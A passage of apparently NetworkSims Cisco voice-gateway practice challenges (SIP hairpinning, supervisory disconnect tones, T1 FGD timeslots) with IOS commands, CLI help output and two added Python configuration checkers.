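    if status.get("SIP User Agent for TCP") != want_tcp:
        findings.append("TCP listener state does not match configuration")
    mf = int(status.get("SIP max-forwards", -1))
    if mf != intended["max_forwards"]:
        findings.append(f"max-forwards is {mf}, configured {intended['max_forwards']}")
    return findings


def unregistered_lines(rows):
    """Line ids whose registration with the registrar has not succeeded."""
    return [r["line"] for r in rows if not r["registered"]]


if __name__ == "__main__":
    for finding in check_sip_ua(parse_status(SHOW_SIP_UA_STATUS), INTENDED):
        print("FINDING:", finding)
    print("unregistered:", unregistered_lines(parse_register_status(SHOW_SIP_UA_REGISTER_STATUS)))
```

Run against the page's own output the listener checks pass (UDP disabled, TCP enabled), both lines 4101 and 4102 are registered, and the single finding is the `max-forwards` mismatch.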

Cisco Router Challenge 236


Outline
This challenge involves SIP Voice Service Configuration for hair-pin calls for all dial-peers.
Objectives
The objectives of this challenge are to:

Allow hairpinned calls for all dial peers with redirect ip2ip.
Set the IP address for all SIP traffic as the local loopback.
Define that the gateway acts as a registrar server.

Commands
> enable
# config t
(config)# voice service voip
(conf-voi-serv)# redirect ip2ip
(conf-voi-serv)# sip
(conf-serv-sip)# bind control source-interface loopback10
(conf-serv-sip)# registrar server expires max 1000 min 500
(conf-serv-sip)# exit
(conf-voi-serv)# exit
(config)# exit
# sh sip-ua status

Example
> enable
# config t
(config)# voice service voip
(conf-voi-serv)# redirect ip2ip
(conf-voi-serv)# sip
(conf-serv-sip)# bind control source-interface loopback10
(conf-serv-sip)# registrar server expires max 1000 min 500
(conf-serv-sip)# exit
(conf-voi-serv)# exit
(config)# exit
# sh sip-ua status

Cisco Gateway and Gatekeeper


SIP Gateway
The most up-to-date version of this test is at:
http://networksims.com/ga04.html

Cisco Router Challenge 237


Outline
This challenge involves configuration of the supervisory tone disconnect.
Objectives
The objectives of this challenge are to:

Define CP tone.
Define timeouts for wait-release and call-disconnect.
Define supervisory disconnect.

Commands
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# timeouts wait-release 10
(config-voiceport)# timeouts call-disconnect 10
(config-voiceport)# cptone us
(config-voiceport)# supervisory disconnect dualtone mid-call

Example
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# ?
Voice-port configuration commands:
battery-reversal Enable FXS battery-reversal generation
bearer-cap Specify the bear capability
busyout Configure busyout trigger event & procedure
caller-id Configure port caller id parameters
comfort-noise Use fill-silence option
connection Specify Trunking Parameters
cptone Configure voice call progress tone locale
default Set a command to its defaults
description Description of what this port is connected to
disc_pi_off close voice path when disconnect with PI received
disconnect-ack FXS sending disconnect acknowledge
echo-cancel Echo-cancellation option
exit Exit from voice-port configuration mode
impedance Specifies the terminating impedance of the interface
input Configure input gain for voice
music-threshold Threshold for Music on Hold
mwi Enable MWI on this port
no Negate a command or set its defaults
non-linear Use non-linear processing during echo cancellation
output Configure output attenuation for voice
playout-delay Configure voice playout delay buffer
ren Ringer Equivalence Number
ring Ring frequency Parameters
shutdown Take voice-port offline
signal The signaling type for the interface FXS or FXO
snmp Modify SNMP voice port parameters
station-id Configure station ID
supervisory Configure supervisory disconnect lcfo
threshold Threshold [noise] for voice port
timeouts Configure voice timeout parameters
timing Configure voice timing parameters
translate Translation rule
translation-profile Translation profile
trunk-group Configure interface to be in a trunk group
voice-class Set voiceport voice class control parameters
(config-voiceport)# timeouts ?
call-disconnect Call Disconnect Timeout after Destination Hangs Up in seconds
hookflash-in Define hookflash-in delay in milliseconds
initial Initial Timeout duration in seconds
interdigit Interdigit Timeout duration in seconds
power-denial Duration for which power-denial is applied
ringing Ringing no answer timeout duration in seconds
wait-release Wait release timeout duration in seconds
(config-voiceport)# timeout w ?
<1-3600> seconds
infinity infinite timeout
(config-voiceport)# timeouts wait-release 10
(config-voiceport)# timeout call ?
<0-120> seconds
infinity infinite timeout
(config-voiceport)# timeouts call-disconnect 10
(config-voiceport)# cp ?
locale 2 letter ISO-3166 country code
AR Argentina
AU Australia
AT Austria
BE Belgium
BR Brazil
CA Canada
CN China
CO Colombia
C1 Custom1
C2 Custom2
CY Cyprus
CZ Czech Republic
DK Denmark
EG Egypt
FI Finland
FR France
DE Germany
GH Ghana
GR Greece
HK Hong Kong
HU Hungary
IS Iceland
IN India
ID Indonesia
IE Ireland
IL Israel
IT Italy
JP Japan
JO Jordan
KE Kenya
KR Korea Republic
LB Lebanon
LU Luxembourg
MY Malaysia
MX Mexico
NP Nepal
NL Netherlands
NZ New Zealand
NG Nigeria
NO Norway
PK Pakistan
PA Panama
PE Peru
PH Philippines
PL Poland
PT Portugal
RU Russian Federation
SA Saudi Arabia
SG Singapore
SK Slovakia
SI Slovenia
ZA South Africa
ES Spain
SE Sweden
CH Switzerland
TW Taiwan
TH Thailand
TR Turkey
GB United Kingdom
US United States
VE Venezuela
ZW Zimbabwe
(config-voiceport)# cptone us
(config-voiceport)# su ?
disconnect Configure supervisory disconnect lcfo
(config-voiceport)# supervisory disconnect dualtone mid-call

Cisco Router Challenge 238


Outline
This challenge involves customizing the Supervisory Disconnect Tone.
Objectives
The objectives of this challenge are to:

Define a tone class.
Apply the tone class for tone details.

Commands
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# supervisory disconnect dualtone pre-connect voice-class 5
(config-voiceport)# exit
(config)# voice class dualtone 5
(cfg-dual-detect)# freq-max-power 20
(cfg-dual-detect)# freq-min-power 10
(cfg-dual-detect)# cadence-variation 10
(cfg-dual-detect)# freq-max-deviation 10
(cfg-dual-detect)# freq-max-delay 10

Example
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# supervisory disconnect dualtone pre-connect voice-class 5
(config-voiceport)# exit
(config)# voice class dualtone 5
(cfg-dual-detect)# ?
VOICECLASS configuration commands:
cadence-variation Cadence variation allowed
exit Exit from voice class configuration mode
freq-max-delay Timing difference between two frequencies
freq-max-deviation Maximum frequency deviation allowed for each frequency
freq-max-power Absolute value of upper limit for tone power per frequency
freq-min-power Absolute value of lower limit for tone power per frequency
freq-power-twist The difference between the power of two frequencies
help Description of the interactive help system
no Negate a command or set its defaults
(cfg-dual-detect)# freq-max-power ?
<0-20> Unit is dbmO
(cfg-dual-detect)# freq-max-power 20
(cfg-dual-detect)# freq-min-power ?
<10-35> Unit is -dbmO
(cfg-dual-detect)# freq-min-power 10
(cfg-dual-detect)# cadence-variation ?
<0-200> Unit is 10 ms
(cfg-dual-detect)# cadence-variation 10
(cfg-dual-detect)# freq-max-dev ?
<10-125> Unit in Hz
(cfg-dual-detect)# freq-max-deviation 10
(cfg-dual-detect)# freq-max-delay ?
<10-100> Unit is 10 ms
(cfg-dual-detect)# freq-max-delay 10

Cisco Router Challenge 239


Outline
This challenge involves configuring FGD for T1.
Objectives
The objectives of this challenge are to:

Configure T1 for the linecode (B8ZS) and framing (ESF).


Define E&M-FGD and FGD-EANA.

Commands
> enable
# config t
(config)# controller t1
(config-controller)# framing esf
(config-controller)# linecode b8zs
(config-controller)# pri-group timeslots 1-10
(config-controller)# no shutdown
(config-controller)# clock source line
(config-controller)# ds0-group 1 t 1-4 type e&m-fgd
(config-controller)# ds0-group 2 t 5-24 type fgd-eana


Example
> enable
# config t
(config)# controller t1
(config-controller)# ?
Controller configuration commands:
cablelength Specify the cable length for a DS1 link
channel-group Specify the timeslots to channel-group mapping for an interface
clock Specify the clock source for a DS1 link
default Set a command to its defaults
description Controller specific description
ds0-group DS0 time slots that make up a logical voice port
exit Exit from controller configuration mode
framing Specify the type of Framing on a DS1 link
help Description of the interactive help system
linecode Specify the line encoding method for a DS1 link
loopback Put the entire T1 line into loopback
no Negate a command or set its defaults
pri-group Configure the specified timeslots for PRI
shutdown Shut down a DS1 link (send Blue Alarm)
(config-controller)# framing ?
esf Extended Superframe
sf Superframe
(config-controller)# framing esf
(config-controller)# linecode ?
ami AMI encoding
b8zs B8ZS encoding
(config-controller)# linecode b8zs
(config-controller)# pri-group timeslots 1-10
(config-controller)# no shutdown
(config-controller)# clock source line
(config-controller)# ds0-group ?
<1-11> ds0-group-number
(config-controller)# ds0-group 1 ?
timeslots number of timeslots
(config-controller)# ds0-group 1 t ?
<1-24> timeslot-list
(config-controller)# ds0-group 1 t 1-4 type ?
e&m-delay-dial
e&m-fgd
e&m-immediate-start
e&m-wink-start
ext-sig
fgd-eana
fxo-ground-start
fxo-loop-start
fxs-ground-start
fxs-loop-start
(config-controller)# ds0-group 1 t 1-4 type e&m-fgd
(config-controller)# ds0-group 2 t 5-24 type fgd-eana
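
A T1 carries 24 DS0 timeslots, and `pri-group`, `ds0-group` and `channel-group` each claim a set of them; a timeslot can belong to only one group. The Python below is an added example, not code from NetworkSims or Cisco: it parses the timeslot lists from a `controller t1` block (accepting the abbreviated `t` used above as well as `timeslots`), rejects ranges outside 1-24, and reports every pair of groups that claim the same DS0s. It runs on the controller configuration from this challenge (embedded as a constructed sample), in which `pri-group timeslots 1-10` overlaps both `ds0-group` entries, so the check reports two overlaps. The regular expression and range syntax handled (`1-4`, `9`, `12-24`, comma-separated) are this example's own assumptions.

```python
# Added example (not from the NetworkSims page or Cisco IOS): find DS0
# timeslots claimed by more than one group in a 'controller t1' config.
import re

T1_MAX_TIMESLOT = 24  # a T1 carries DS0 timeslots 1-24


def parse_timeslots(spec):
    """Expand a timeslot list such as '1-4' or '1-4,9,12-24' into a sorted
    list of ints. Raises ValueError for anything outside 1-24 or reversed."""
    slots = set()
    for part in spec.split(","):
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        if lo > hi or lo < 1 or hi > T1_MAX_TIMESLOT:
            raise ValueError(f"bad timeslot range {part!r}")
        slots.update(range(lo, hi + 1))
    return sorted(slots)


# Matches 'pri-group timeslots 1-10', 'ds0-group 1 t 1-4 ...',
# 'channel-group 0 timeslots 1-24 ...' (abbreviated 't' accepted as IOS does).
GROUP_RE = re.compile(
    r"^\s*(pri-group|ds0-group\s+\d+|channel-group\s+\d+)\s+t(?:imeslots)?\s+(\S+)"
)


def parse_controller(lines):
    """Return [(group_name, [timeslots...]), ...] for each group line."""
    groups = []
    for raw in lines:
        m = GROUP_RE.match(raw)
        if m:
            groups.append((m.group(1), parse_timeslots(m.group(2))))
    return groups


def find_overlaps(groups):
    """Return (group_a, group_b, shared_slots) for every pair of groups that
    claim the same DS0s; an empty list means the assignment is consistent."""
    overlaps = []
    for i, (name_a, slots_a) in enumerate(groups):
        for name_b, slots_b in groups[i + 1:]:
            shared = sorted(set(slots_a) & set(slots_b))
            if shared:
                overlaps.append((name_a, name_b, shared))
    return overlaps


# Constructed sample: the controller configuration from the challenge.
CONTROLLER_T1 = [
    "controller t1",
    " framing esf",
    " linecode b8zs",
    " pri-group timeslots 1-10",
    " no shutdown",
    " clock source line",
    " ds0-group 1 t 1-4 type e&m-fgd",
    " ds0-group 2 t 5-24 type fgd-eana",
]

if __name__ == "__main__":
    for a, b, shared in find_overlaps(parse_controller(CONTROLLER_T1)):
        print(f"{a} and {b} both claim timeslots {shared}")
```

On the sample the output is two lines: `pri-group` and `ds0-group 1` both claim 1-4, and `pri-group` and `ds0-group 2` both claim 5-10; the two `ds0-group` entries themselves do not overlap.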

Cisco Gateway and Gatekeeper


Circuits
The most up-to-date version of this test is at:
http://networksims.com/ga05.html